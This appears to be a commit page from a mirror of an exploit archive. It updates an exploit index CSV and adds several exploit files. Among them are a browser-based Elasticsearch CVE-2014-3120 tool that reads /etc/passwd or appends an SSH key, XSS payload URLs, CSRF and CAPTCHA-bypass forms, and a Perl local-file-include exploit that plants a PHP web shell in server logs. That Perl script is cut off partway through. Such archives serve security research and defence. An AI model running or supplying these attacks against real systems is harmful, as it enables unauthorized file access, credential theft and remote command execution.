bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_17_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-17 04:36:26 +00:00
parent 4d927f6c33
commit f648ecf6bd
18 changed files with 415 additions and 12 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

38
files.csv
View file

@ -8608,7 +8608,7 @@ id,file,description,date,author,platform,type,port
9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 Multiple SQL Injection Vulnerabilities",2009-07-11,MizoZ,php,webapps,0
9126,platforms/php/webapps/9126.txt,"Joomla Component com_category (catid) SQL Injection Vulnerability",2009-07-11,Prince_Pwn3r,php,webapps,0
9127,platforms/php/webapps/9127.txt,"d.net CMS Arbitrary Reinstall/Blind SQL Injection Exploit",2009-07-11,darkjoker,php,webapps,0
9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client (response) Remote BOF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0
9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - (response) Remote BOF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0
9129,platforms/php/webapps/9129.txt,"censura 1.16.04 (bsql/xss) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0
9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free version 1.0.5 - Remote File Disclosure Vuln",2009-07-12,IRCRASH,php,webapps,0
9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC",2009-07-13,otokoyama,windows,dos,0
@ -10272,7 +10272,7 @@ id,file,description,date,author,platform,type,port
11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0
11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0
11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0
11199,platforms/windows/local/11199.txt,"Windows NT User Mode to Ring 0 Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0
11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring 0 Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0
11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BOF (SEH)",2010-01-19,jacky,windows,local,0
11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0
11204,platforms/windows/remote/11204.html,"AOL 9.5 ActiveX 0day Exploit (heap spray)",2010-01-20,Dz_attacker,windows,remote,0
@ -13306,7 +13306,7 @@ id,file,description,date,author,platform,type,port
15334,platforms/windows/dos/15334.py,"MinaliC Webserver 1.0 - Denial of Service Vulnerability",2010-10-27,"John Leitch",windows,dos,0
15335,platforms/php/webapps/15335.txt,"alstrasoft e-friends 4.96 Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0
15336,platforms/windows/remote/15336.txt,"MinaliC Webserver 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0
15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 Buffer Overflow Exploit",2010-10-27,blake,windows,remote,0
15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 - Buffer Overflow Exploit",2010-10-27,blake,windows,remote,0
15338,platforms/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection Vulnerability",2010-10-27,EraGoN,php,webapps,0
15340,platforms/php/webapps/15340.txt,"mycart 2.0 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0
15341,platforms/multiple/dos/15341.html,"Firefox Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
@ -14162,9 +14162,9 @@ id,file,description,date,author,platform,type,port
16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16380,platforms/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC Buffer Overflow",2010-11-14,metasploit,windows,remote,0
16381,platforms/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow",2010-11-14,metasploit,windows,remote,0
16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow",2010-11-30,metasploit,windows,remote,0
16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow",2010-11-30,metasploit,windows,remote,0
16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow",2010-11-24,metasploit,windows,remote,0
16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow",2010-11-30,metasploit,windows,remote,0
16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow",2010-11-30,metasploit,windows,remote,0
16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow",2010-11-24,metasploit,windows,remote,0
16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow",2010-07-03,metasploit,windows,remote,0
16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver Probe Response SSID Overflow",2010-07-03,metasploit,hardware,remote,0
@ -18829,7 +18829,7 @@ id,file,description,date,author,platform,type,port
21571,platforms/irix/remote/21571.c,"SGI IRIX 6.x rpc.xfsmd Remote Command Execution Vulnerability",2002-06-20,"Last Stage of Delirium",irix,remote,0
21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 New Player Flood Denial of Service Vulnerability",2002-06-20,"Auriemma Luigi",multiple,dos,0
21573,platforms/cgi/webapps/21573.txt,"YaBB 1 Invalid Topic Error Page Cross Site Scripting Vulnerability",2002-06-21,methodic,cgi,webapps,0
21574,platforms/unix/remote/21574.txt,"Pirch IRC Client 98 Malformed Link Buffer Overrun Vulnerability",2002-06-21,"David Rude II",unix,remote,0
21574,platforms/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun Vulnerability",2002-06-21,"David Rude II",unix,remote,0
21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x Off-By-One HTAccess Buffer Overflow Vulnerability",2002-06-22,"Frank DENIS",multiple,dos,0
21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 EXT.DLL Cross Site Scripting Vulnerability",2002-06-23,"Matthew Murphy",windows,remote,0
21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 Buffer Overflow Vulnerability",2002-11-06,watercloud,hp-ux,local,0
@ -21399,7 +21399,7 @@ id,file,description,date,author,platform,type,port
24219,platforms/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 ActiveX Control Dangerous Method Vulnerability",2004-06-16,"eEye Digital Security Team",windows,remote,0
24220,platforms/windows/remote/24220.html,"IBM EGatherer 2.0 ActiveX Control Dangerous Method Vulnerability",2004-06-01,"eEye Digital Security Team",windows,remote,0
24221,platforms/linux/remote/24221.pl,"Asterisk PBX 0.7.x Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,linux,remote,0
24222,platforms/linux/dos/24222.c,"ircd-hybrid 7.0.1,ircd-ratbox 1.5.1/2.0 Socket Dequeuing Denial of Service Vulnerability",2004-06-19,"Erik Sperling Johansen",linux,dos,0
24222,platforms/linux/dos/24222.c,"ircd-hybrid 7.0.1,ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service Vulnerability",2004-06-19,"Erik Sperling Johansen",linux,dos,0
24223,platforms/linux/remote/24223.py,"Rlpr 2.0 msg() Function Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,linux,remote,0
24224,platforms/multiple/remote/24224.c,"TildeSlash Monit 1-4 Authentication Handling Buffer Overflow Vulnerability",2004-06-04,"Nilanjan De",multiple,remote,0
24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 Attachment Remote Command Execution Vulnerability",2004-06-21,"Guy Pearce",php,webapps,0
@ -22559,7 +22559,7 @@ id,file,description,date,author,platform,type,port
25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0
25442,platforms/php/webapps/25442.txt,"WHMCS 4.x (invoicefunctions.php, id param) - SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0
25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow Vulnerability (SEH)",2013-05-14,ariarat,windows,dos,0
25444,platforms/linux/local/25444.c,"Linux PERF_EVENTS - Local Root Exploit",2013-05-14,sd,linux,local,0
25444,platforms/linux/local/25444.c,"Linux 2.6.37-3.x.x PERF_EVENTS - Local Root Exploit",2013-05-14,sd,linux,local,0
25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000
25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000
25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection Vulnerabilities",2013-05-14,RunRunLevel,php,webapps,0
@ -23231,7 +23231,7 @@ id,file,description,date,author,platform,type,port
26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0
26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
26131,platforms/linux/local/26131.c,"Linux kernel perf_swevent_init - Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 perf_swevent_init - Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0
@ -26278,7 +26278,7 @@ id,file,description,date,author,platform,type,port
29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing Vulnerability",2006-12-15,"Matousec Transparent security",windows,dos,0
29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0
29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.PHP Local File Include Vulnerability",2006-12-16,Kacper,php,webapps,0
29290,platforms/linux/remote/29290.c,"Apache / PHP 5.x Remote Code Execution Exploit",2013-10-29,kingcope,linux,remote,80
29290,platforms/linux/remote/29290.c,"Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,linux,remote,80
29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0
29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection Vulnerability",2006-12-16,ShaFuck31,asp,webapps,0
29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection Vulnerability",2006-12-18,IMHOT3B,php,webapps,0
@ -30079,3 +30079,19 @@ id,file,description,date,author,platform,type,port
33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 'dtoa()' Remote Code Execution Vulnerability",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0
33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution Vulnerability",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0
33365,platforms/php/webapps/33365.txt,"WordPress WP-PHPList Plugin 2.10.2 'unsubscribeemail' Parameter Cross-Site Scripting Vulnerability",2009-11-29,MustLive,php,webapps,0
33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 'mtb_undelete' Parameter Cross-Site Scripting Vulnerability",2009-11-15,MustLive,php,webapps,0
33367,platforms/php/webapps/33367.txt,"FireStats WordPress Plugin 1.0.2 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0
33368,platforms/php/webapps/33368.html,"FireStats WordPress Plugin 1.0.2 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0
33370,platforms/multiple/webapps/33370.html,"ElasticSearch Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0
33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-11-09,MustLive,php,webapps,0
33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA Security Bypass Vulnerability",2009-11-13,MustLive,php,webapps,0
33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin Multiple Cross Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0
33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x graph.php Multiple Parameter XSS",2009-11-21,"Moritz Naumann",php,webapps,0
33375,platforms/php/webapps/33375.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 Delete Function Cross Site Request Forgery Vulnerability",2009-11-24,"Alice Kaerast",php,webapps,0
33376,platforms/php/webapps/33376.pl,"klinza professional cms 5.0.1 'menulast.php' Local File Include Vulnerability",2009-11-24,klinza,php,webapps,0
33377,platforms/php/webapps/33377.txt,"Joomla! ProofReader 1.0 RC9 Component Cross-Site Scripting Vulnerability",2009-11-16,MustLive,php,webapps,0
33378,platforms/php/webapps/33378.txt,"Joomla! 1.5.x 404 Error Page Cross Site Scripting Vulnerability",2009-11-23,MustLive,php,webapps,0
33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 404 Error Page Cross Site Scripting Vulnerability",2009-09-02,MustLive,multiple,remote,0
33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x Cross-site Scripting Vulnerability",2008-02-16,MustLive,php,webapps,0
33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability",2009-11-30,s4r4d0,php,webapps,0
33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS 'categoryid' Parameter Cross Site Scripting Vulnerability",2009-11-30,SoldierOfAllah,php,webapps,0

Can't render this file because it is too large.

11
platforms/multiple/remote/33379.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37149/info
Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Tomcat 3.2.1 is affected; other versions may also be vulnerable.
http://www.example.com/?offset=1&cid=1&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/?offset=1&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cid=1

152
platforms/multiple/webapps/33370.html Executable file
View file

@ -0,0 +1,152 @@
<!--
##CVE-2014-3120 Elastic Search Remote Code Execution
This project demonstrates the CVE-2014-3120 vulnerability/misconfiguration. It allows you to read from and append to files on the system hosting ES, provided the user running ES has access to them.
###Notes
This does not require a web server. Save it locally and run it from a browser.
Discovery and vuln publishing credit goes to: @BvdBijl - http://bouk.co/blog/elasticsearch-rce/
-->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- Latest compiled and minified CSS -->
<link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet">
<!-- Optional theme -->
<link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap-theme.min.css" rel="stylesheet">
<style>
body {
padding-top: 50px;
}
.starter-template {
padding: 40px 15px;
text-align: center;
}
</style>
</head>
<script src="http://code.jquery.com/jquery-1.11.1.min.js"></script>
<script>
function es_inject() {
var read_file;
var write_file;
read_file = function(filename) {
return ("import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"" + filename + "\")).useDelimiter(\"\\\\Z\").next();");
};
write_file = function(filename) {
return ("import java.util.*;\nimport java.io.*;\nPrintWriter writer = new PrintWriter(new BufferedWriter(new FileWriter(\"" + filename + "\", true)));\nwriter.println(\"" + document.getElementById("element_2").value + "\");\nwriter.close();");
};
$(function() {
var payload, filename, files, host, _i, _len;
files = [document.getElementById("element_3").value];
payload = {
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {}
}
}
},
"script_fields": {}
};
if (document.getElementById("element_4").checked) {
for (_i = 0, _len = files.length; _i < _len; _i++) {
filename = files[_i];
payload["script_fields"][filename] = {
"script": write_file(filename)
};
}
} else {
for (_i = 0, _len = files.length; _i < _len; _i++) {
filename = files[_i];
payload["script_fields"][filename] = {
"script": read_file(filename)
};
}
}
$.getJSON("http://" + document.getElementById("element_1").value + ":9200/_search?source=" + (encodeURIComponent(JSON.stringify(payload))) + "&callback=?", function(data) {
var content, contents, hit, _j, _len1, _ref, _results;
console.log(data);
_ref = data["hits"]["hits"];
_results = [];
for (_j = 0, _len1 = _ref.length; _j < _len1; _j++) {
hit = _ref[_j];
_results.push((function() {
var _k, _len2, _ref1;
_ref1 = hit["fields"];
for (filename in _ref1) {
contents = _ref1[filename];
document.getElementById("script_results").innerHTML += ("<h2>" + filename + "</h2>");
for (_k = 0, _len2 = contents.length; _k < _len2; _k++) {
content = contents[_k];
document.getElementById("script_results").innerHTML += (content);
}
document.getElementById("script_results").innerHTML += ("<hr>");
//document.getElementById("script_results").innerHTML += (document.getElementById("element_4").checked);
}
})());
}
return _results;
});
});
};
//es_inject();
</script>
<body>
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">Elastic Inject</a>
</div>
</div>
</div>
<div class="container">
<div class="starter-template">
<h2>CVE-2014-3120 Elastic Search Remote Code Execution</h2>
<p class="lead">This will read and write files from an ES instance vulnerable to CVE-2014-3120.<br> This is for demonstration purposes only.</p>
</div>
<div class="col-md-8">
<!-- <form id="ES_Inject" action="" method=""> /-->
<label for="element_1">ES_IP_Address: </label><br/>
<input id="element_1" name="element_1" class="element text medium" type="text" maxlength="255" value="127.0.0.1"/> <br/>
<label for="element_3">File to read/append to: </label><br/>
<input id="element_3" name="element_3" class="element text medium" type="text" maxlength="255" value="/etc/passwd"/> <br/>
<label class="description" for="element_2">Content to append: </label><br/>
<textarea id="element_2" name="element_2" class="element textarea large">YOUR_SSH_PUBLIC_KEY or SOMETHING&lt;/textarea&gt; <br/>
<!-- <input id="element_4" type="radio" name="es_action" value="read" checked>READ<br/> /-->
<input id="element_4" type="checkbox" name="es_action" value="write">WRITE<br/>
<!-- <input id="saveForm" class="button_text" type="submit" name="submit" value="Submit" onClick="es_inject();"/> /-->
<button onclick="es_inject();">Click me</button>
<!-- </form> /-->
<h3>Your file contents should appear below if a read is successful. </h3>
<div id="script_results">
</div>
</div>
<div class="col-md-8">
Original vulnerability discovered by <a href="https://twitter.com/bvdbijl"> @BvdBijl</a> - <a href="http://bouk.co/blog/elasticsearch-rce/">http://bouk.co/blog/elasticsearch-rce/</a>
</div>
</div><!-- /.container -->
<script src="//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script>
</body></html>

7
platforms/php/webapps/33366.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37097/info
The Trashbin plugin for WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.come/wp-admin/edit.php?page=mtb_trashbin/trashbin.php&mtb_undelete=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

9
platforms/php/webapps/33367.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37099/info
The FireStats plugin for WordPress is prone to multiple cross-site scripting vulnerabilities and an authentication-bypass vulnerability.
An attacker may leverage these issues to gain unauthorized access to the affected application and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
FireStats 1.0.2 is vulnerable; other versions may also be affected.
<html> <head> <title>FireStats XSS exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://www.example.com/wp-content/plugins/firestats/php/ajax-handler.php?FS_FULL_INSTALLATION=1&FS_IN_WORDPRESS=0" method="post"> <input type="hidden" name="action" value="<BODY onload=alert(document.cookie)>" /> </body> </html>

9
platforms/php/webapps/33368.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37099/info
The FireStats plugin for WordPress is prone to multiple cross-site scripting vulnerabilities and an authentication-bypass vulnerability.
An attacker may leverage these issues to gain unauthorized access to the affected application and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
FireStats 1.0.2 is vulnerable; other versions may also be affected.
<html> <head> <title>FireStats Insuficient Anti-automation exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://www.example.com/wp-content/plugins/firestats/php/ajax-handler.php?FS_FULL_INSTALLATION=1&FS_IN_WORDPRESS=0" method="post"> <input type="hidden" name="action" value="reclaculateDBCache" /> </body> </html>

9
platforms/php/webapps/33371.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37100/info
The WP-Cumulus plugin for WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to WP-Cumulus 1.23 are vulnerable.
http://www.example.com/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

9
platforms/php/webapps/33372.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37103/info
Fuctweb CapCC Plugin for WordPress is prone to a security-bypass vulnerability that occurs in the audio CAPTCHA protocol.
Successful exploits may allow attackers to bypass security restrictions and perform unauthorized actions.
CapCC 1.0 is affected; other versions may also be vulnerable.
<html> <head><base href="http://websecurity.com.ua/uploads/2008/CapCC%20CAPTCHA%20bypass.html" /> <title>CapCC CAPTCHA bypass exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://sitewww.example.com/wp-comments-post.php" method="post"> <input type="hidden" name="author" value="Test"> <input type="hidden" name="email" value="test@www.example.com"> <input type="hidden" name="url" value="http://www.example.com"> <input type="hidden" name="comment" value="Captcha bypass test."> <input type="hidden" name="comment_post_ID" value="1"> <input type="hidden" name="capcc_captchakey" value="EQoenVjf6wemPguoYT6CJwl0O"> <input type="hidden" name="capcc_captcha" value="gthsw"> </form> </body> </html>

13
platforms/php/webapps/33373.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/37105/info
The Subscribe to Comments plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
Versions prior to Subscribe to Comments 2.0.8 are vulnerable.
http://www.example.com/blog_path/wp-subscription-manager.php?ref=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/blog_path/wp-admin/edit.php?page=subscribe-to-comments.php&ref=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/blog_path/wp-subscription-manager.php?email=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/blog_path/wp-admin/edit.php?page=subscribe-to-comments.php&email=%3Cscript%3Ealert(document.cookie)%3C/script%3E

12
platforms/php/webapps/33374.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37109/info
Cacti is prone to multiple cross-site-scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Versions prior to Cacti 0.8.7g are vulnerable.
http://www.example.com/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27
http://www.example.com/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E
http://www.example.com/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E

14
platforms/php/webapps/33375.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/37115/info
Quick.Cart and Quick.CMS are prone to a cross-site request-forgery vulnerability because the applications allow users to bypass certain security checks.
Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to an affected application, or delete certain data. Other attacks are also possible.
Quick.Cart 3.4 and Quick.CMS 2.4 are vulnerable; other versions may also be affected.
NOTE: The vendor refutes this issue stating the issue can not be replicated as described.
<img
src="http://www.example.com/Quick.Cart/demo/admin.php?p=orders-delete&iOrder=2" />
<iframe
src="http://www.example.com/Quick.Cms/demo_lite/admin.php?p=p-delete&iPage=1"></iframe>

91
platforms/php/webapps/33376.pl Executable file
View file

@ -0,0 +1,91 @@
source: http://www.securityfocus.com/bid/37127/info
The 'klinza professional cms' project is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects 'klinza professional cms 5.0.1' and prior versions.
#!/usr/bin/perl
#klinza cms <= 5.0.1 Local File Include Exploit
#Discovered by cr4wl3r
#Contact : cr4wl3r[4t]linuxmail[dot]org
use IO::Socket;
use LWP::Simple;
@apache=(
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access.log",
"../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../var/log/apache/access_log",
"../../../../../../../var/log/apache2/access_log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/access_log",
"../../../../../../../var/log/access.log",
"../../../../../../../var/www/logs/error_log",
"../../../../../../../var/www/logs/error.log",
"../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../var/log/apache/error_log",
"../../../../../../../var/log/apache2/error_log",
"../../../../../../../var/log/apache/error.log",
"../../../../../../../var/log/apache2/error.log",
"../../../../../../../var/log/error_log",
"../../../../../../../var/log/error.log"
);
if (@ARGV < 3){
print "
========================================================================
| klinza <= 0.0.1 Local File Include Exploit
| Usage: klinza.pl [target] [path] [apachepath]
| Example: klinza.pl target.com /LANG/ ../logs/error.log
| coded by : cr4wl3r
========================================================================
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "Injecting code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
